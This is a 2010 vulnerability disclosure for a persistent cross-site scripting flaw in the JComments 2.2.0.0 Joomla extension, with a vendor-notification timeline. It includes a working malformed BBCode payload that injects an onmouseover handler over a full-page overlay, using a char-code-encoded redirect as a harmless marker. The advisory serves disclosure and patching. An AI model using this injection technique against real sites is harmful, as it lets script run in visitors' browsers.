Sunday, 05 September 2010 13:55

JComments 2.2.0.0 suffers from a persistent XSS vulnerability in the way it handles certain BBCodes.

If [url] and [img] tags are available, the following malformed BBCode will result in code execution:

123456789 12345678 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789 123456789
[url]x[url]s[/url]s[/url]!
" style="position: absolute; top:0px; left:0px; width: 99em; height: 99em" onmouseover = "location.href = String.fromCharCode( 35,88,83, 83,101, 100,32, 98,121, 32,106, 100,99 )" x="
[url]x[img]s[/url]s[/img]="!">

Timeline

  • Vulnerabilities Discovered: 23 August 2010
  • Vendor Notified: 24 August 2010
  • Vendor Response: 25 August 2010
  • Update Available: ... 2010
  • Disclosure: 5 September 2010
Last Updated on Thursday, 30 September 2010 17:37
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions